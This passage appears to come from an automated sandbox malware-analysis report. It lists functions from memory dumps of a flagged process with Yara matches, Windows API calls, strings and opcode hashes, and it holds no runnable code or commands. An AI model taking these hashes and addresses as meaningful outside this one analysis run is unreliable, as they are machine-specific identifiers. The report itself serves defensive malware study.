                                                                      • Instruction ID: af67b4a966959a70f803be64258a5efbd33f0c98f877c3c692167b51d18f2ce2
                                                                      • Opcode Fuzzy Hash: 9494f4faf584a63aea2a10df2ea7dfc00e0a5689bebb088b96280dda424d2d8c
                                                                      • Instruction Fuzzy Hash: EC90022260140502E1017259944461E041A8BD1241FD5C066A1024565ECA268A92A135
                                                                      Function 050B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b6875f34f26cebb4b03967922468f79238b077ca348c6d465dff72938d18560e
                                                                      • Instruction ID: 2a4d025e3856208e41e18b94fd3716dc80d1888185f34c2abea1c29f5189f2b9
                                                                      • Opcode Fuzzy Hash: b6875f34f26cebb4b03967922468f79238b077ca348c6d465dff72938d18560e
                                                                      • Instruction Fuzzy Hash: 7F90026220180403E1407659984460F04158BD1302F95C055A2064565E8A2A8D516139
                                                                      Function 050B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 441f744a61432543cac911c91a4771ac40a01441861a284dbebd6536b3088241
                                                                      • Instruction ID: 7f94712ef185cbb6355c0010f8fcd925d8cb7a8dd1500819055ec667d1306d28
                                                                      • Opcode Fuzzy Hash: 441f744a61432543cac911c91a4771ac40a01441861a284dbebd6536b3088241
                                                                      • Instruction Fuzzy Hash: 7D9002622024000351057259945461E441A8BE1201B95C065E10145A0DC52689916129
                                                                      Function 050B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a98b8feeadcd8f4950559d10ee3ee09b8edb51d51563e049160eaef68aa9f0a2
                                                                      • Instruction ID: 3f23bf17d7129469e2145b6261c90f06c684030347d1af5d7bd4d578e18808eb
                                                                      • Opcode Fuzzy Hash: a98b8feeadcd8f4950559d10ee3ee09b8edb51d51563e049160eaef68aa9f0a2
                                                                      • Instruction Fuzzy Hash: 7090023260540802E1507259945474E04158BD1301F95C055A0024664D87568B5576A5
                                                                      Function 050B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8d81305333790feb0633c7c89ae240e9bf8653e2994d53d154d89e9c522f4bfc
                                                                      • Instruction ID: 52d3268a8f583295165074e9fe49df0592c8732d54b06c27e368140d0fe84bb6
                                                                      • Opcode Fuzzy Hash: 8d81305333790feb0633c7c89ae240e9bf8653e2994d53d154d89e9c522f4bfc
                                                                      • Instruction Fuzzy Hash: 2E90023220544842E14072599444A4E04258BD1305F95C055A00646A4D96268E55B665
                                                                      Function 050B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8b8355c0eb408573579ee486960195a7f4df383e5cc88443119a9c3c97758f75
                                                                      • Instruction ID: 8a60d1f53c7959ac6db9c7b881720d76a8197132582cee23a5d4ed8a49d2cf06
                                                                      • Opcode Fuzzy Hash: 8b8355c0eb408573579ee486960195a7f4df383e5cc88443119a9c3c97758f75
                                                                      • Instruction Fuzzy Hash: 3490023220140802E1807259944464E04158BD2301FD5C059A0025664DCA168B5977A5
                                                                      Function 050B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 103a5f59aa31bd2f1d500af2c3185b262c3cb05f1cb4fb6e918d6614ae730a19
                                                                      • Instruction ID: 4378a95c215e03a4938ab2e7c4c57f2fef667124410c6e7c645ebd59400d309e
                                                                      • Opcode Fuzzy Hash: 103a5f59aa31bd2f1d500af2c3185b262c3cb05f1cb4fb6e918d6614ae730a19
                                                                      • Instruction Fuzzy Hash: 68900226211400031105B659574450F04568BD6351395C065F1015560CD62289615125
                                                                      Function 050B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a7afcbc2787ee6967221065b28eb3bccc48e8b2a73dfd00048b89f3b5f86d02d
                                                                      • Instruction ID: cc11657afa1d36b7fd7b762c0883677751d9413a2aa501829ff691c2914a170f
                                                                      • Opcode Fuzzy Hash: a7afcbc2787ee6967221065b28eb3bccc48e8b2a73dfd00048b89f3b5f86d02d
                                                                      • Instruction Fuzzy Hash: 41900226221400021145B659564450F08559BD73513D5C059F14165A0CC62289655325
                                                                      Function 050B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 81e6abe32dbb9a35add4b34679a04f998c497e99dcbceb9ff1f333715fe015a9
                                                                      • Instruction ID: d27becb56165ce551dba309e31834d11031088cc23d88c964267e5338fdd9df1
                                                                      • Opcode Fuzzy Hash: 81e6abe32dbb9a35add4b34679a04f998c497e99dcbceb9ff1f333715fe015a9
                                                                      • Instruction Fuzzy Hash: 2390023260550402E1007259955470E14158BD1201FA5C455A0424578D87968A5165A6
                                                                      Function 050B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4085401683.0000000005040000.00000040.00001000.00020000.00000000.sdmp, Offset: 05040000, based on PE: true
                                                                      • Associated: 00000008.00000002.4085401683.0000000005169000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.000000000516D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.4085401683.00000000051DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_5040000_ieUnatt.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 89eb2d3910d81699bb39413f1162414a0b01b95fc9e2a198cdee512739a170fb
                                                                      • Instruction ID: fb7d5e5a918b8a42b4663acc3b3187c43540bd7e367c16e7f8d94d0ee6731b62
                                                                      • Opcode Fuzzy Hash: 89eb2d3910d81699bb39413f1162414a0b01b95fc9e2a198cdee512739a170fb
                                                                      • Instruction Fuzzy Hash: E390022224545102E150725D944461E4415ABE1201F95C065A08145A4D855689556225
                                                                      Function 02F840E0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 02F841BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: b9dd7ee228e8f2fa18e1d13e783cd6ba2d64cd5126902265b7e6cc04117ded1e
                                                                      • Instruction ID: e8805e5fd0676feed34fd1bd19b96d392ba9deac3ff0f98c9a009698ebc0ad47
                                                                      • Opcode Fuzzy Hash: b9dd7ee228e8f2fa18e1d13e783cd6ba2d64cd5126902265b7e6cc04117ded1e
                                                                      • Instruction Fuzzy Hash: BE315CB1A00705ABD714EFA4DC84FEBFBB9FB88754F008519A659AB240D7746640CFE1
                                                                      Function 02F7FB79 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                      • Instruction ID: de3988fcc5c9e94324b0f6deb6e4fd3ca392686634c49ecfd37ee1e6b38594ef
                                                                      • Opcode Fuzzy Hash: de5a31385c328d8bbaf5184cb2fe0e9de137bf6faae5f28632f0df6f3a671b09
                                                                      • Instruction Fuzzy Hash: 5B311276A00609AFDB00DFD8DC809EEB7B9FF88344B108559EA15EB214D775EE458BA0
                                                                      Function 02F7FB80 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                      • Instruction ID: dc07696eddd3c5c8e265ff33ab8c903fff194190c3e3178d764e0576674126ed
                                                                      • Opcode Fuzzy Hash: 3d2868bd7d8cffc8f43c45ed604541bd459a96e091fdc21a63dcd20c9be21b48
                                                                      • Instruction Fuzzy Hash: 66313275A002099FDB00DFD8CC809EFB7B9FF88344B108559EA05EB214D775EE058BA0
                                                                      Function 02F74C93 Relevance: 1.6, APIs: 1, Instructions: 90libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F74C42
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                      • Instruction ID: e8d3f32d6e1c89591a0261499bb0c3c442e5243c6aba31a9530eae088dd81376
                                                                      • Opcode Fuzzy Hash: 053a41170c05f9030fbabc1ce501264e8b41e8ee11647377fdeb60175f8d8c96
                                                                      • Instruction Fuzzy Hash: 5121BE766492495ACB11DBA8CC80BDEBF74EF052A8F05039ED644DF182D360D000C3A1
                                                                      Function 02F787F9 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F723B0,02F8860F,02F85CCF,02F72380), ref: 02F787F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                      • Instruction ID: 287161df312c1874dbc9dbef9b78629123a61b560c0523552e471c178de73238
                                                                      • Opcode Fuzzy Hash: 5276fb4a1b239734d44764245dd22877f7e2356c71543ede17b0eb0ba95cc3d9
                                                                      • Instruction Fuzzy Hash: 6401DB72D051086AEB10BBA5DC89F6BB37DDB40794F004296F909F6141E778A7418FA5
                                                                      Function 02F74BD0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F74C42
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction ID: 54c4158568cc8702b466240a7199d9bba962d8c64ece99c94261f991cb41b69b
                                                                      • Opcode Fuzzy Hash: 68a1343607c5a450f7786a2c1a825d0cce543795bf5a9c2a52c786633a32a0ce
                                                                      • Instruction Fuzzy Hash: DF0121B6E0020DBBDF14EBE4EC41F9DB7799B54348F004196EA1897240F631EB54CBA1
                                                                      Function 02F89EE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,02F7898E,00000010,?,?,?,00000044,?,00000010,02F7898E,?,B416F980,?), ref: 02F89F43
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                      • Instruction ID: 35c3f7b89d37e063a0d94f72e5f0d5a9d4132990c09b98fb4195b25ac0592832
                                                                      • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                      • Instruction Fuzzy Hash: 440184B2204508BBCB44DE99DC81EDB77ADEF8D754F508108FA0DD3241D630F9518BA4
                                                                      Function 02F78A20 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                      • Instruction ID: d1de617ae255b88671f3185afbf6adf2a6d76636fc03358b587b22ed08bdc28f
                                                                      • Opcode Fuzzy Hash: cb4f00e556da49cfa7235e78ec53b1c4974b33f87a0a9f7577705fee751f48d9
                                                                      • Instruction Fuzzy Hash: BDF02731C042192AE620253C188D5E177185B613E8F648B91DA148A2C6F721D916B251
                                                                      Function 02F69F00 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F69F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                      • Instruction ID: 23fc7c83395794ccb72eee236e9f2afcbca77fd65abc858f8f1182201609f77b
                                                                      • Opcode Fuzzy Hash: 1eff612db578adf7c9a658527cb72a1c0f83d5e3b372ff275e994e199846ca5b
                                                                      • Instruction Fuzzy Hash: 1AF0307334060436E72071A9AC02FABB29CCF80BA1F190016FB0DEA1C0D991B50146E5
                                                                      Function 02F789C9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                      • Instruction ID: 532898a77ac17ae10e19b982b35b319faae2484aeb8801a4a81824fa32525922
                                                                      • Opcode Fuzzy Hash: 7d5be2cbd9e80e73f555419667aa3204c470ad418dd8067d0d4da221e1f51528
                                                                      • Instruction Fuzzy Hash: 3FE0D8726102087BF724AA68DC85B69334C5B98BE4F084661FA18DB1C2F264E612A560
                                                                      Function 02F89E50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,02F74434,000000F4), ref: 02F89E8C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction ID: ea499066726180c3e57bb0f8885f136af4e8629b466d915ed9f7a5d12eeaf21c
                                                                      • Opcode Fuzzy Hash: 03c4c79e38dc09a6bc7d5db5b5ebb6e976b89401a2158c2de3acff6390cbe796
                                                                      • Instruction Fuzzy Hash: 50E065B6204204BFE610EF68DC40FAB73ADEFCAB50F004009FA0CA7241D670B9108AB5
                                                                      Function 02F89E00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(02F720B9,?,02F85E8F,02F720B9,02F85CCF,02F85E8F,?,02F720B9,02F85CCF,00001000,?,?,00000000), ref: 02F89E3C
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction ID: 5a00f76ca38f8be48fdd99208443b2d6c85b534cfd2fdb33d1b4a4455302ed25
                                                                      • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                      • Instruction Fuzzy Hash: C7E06576204204BBD610EE68DC40FAB73ADEF8AB50F004409FA08A7241DA71BA618BB5
                                                                      Function 02F789D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F789FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                      • Instruction ID: fa947a9904195c34ca2b4acda1a7d0b3d1341d005bf29b83efa1eb5f4fc7fb85
                                                                      • Opcode Fuzzy Hash: 73c06abc1a5872357217b733ae1be97597b77fa479ceb252f7eeff0ad9a7ae8c
                                                                      • Instruction Fuzzy Hash: 8CE0867165024837FB246AA8EC49F66339C9B88BE8F184661FA1CDB2C1F678F611A150
                                                                      Function 02F787C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02F723B0,02F8860F,02F85CCF,02F72380), ref: 02F787F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                      • Instruction ID: bfcf00c4e1ea281afe674dd310f0fe38b576df4d88a1f4f38f4c95d2bcde8d85
                                                                      • Opcode Fuzzy Hash: 9be2c97a75a0baad5004be78a453f2c349cdf09b05c736c63d79afcd240c75b7
                                                                      • Instruction Fuzzy Hash: C2D05E717803043BF601A6F5DC87F5B328D8B407D4F054065BA4CE63C1ED64F20145A9
                                                                      Function 02F7148B Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02F7149D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_2f60000_ieUnatt.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction ID: e76f43e079c4e32eee624940e235fdb640a02ccb5b818a41a959915bee3f9e5b
                                                                      • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction Fuzzy Hash: 87D0A732B4020C30EA3145505C42FFF7B6C8B42A81F004177FB08F50C1D680140906A5
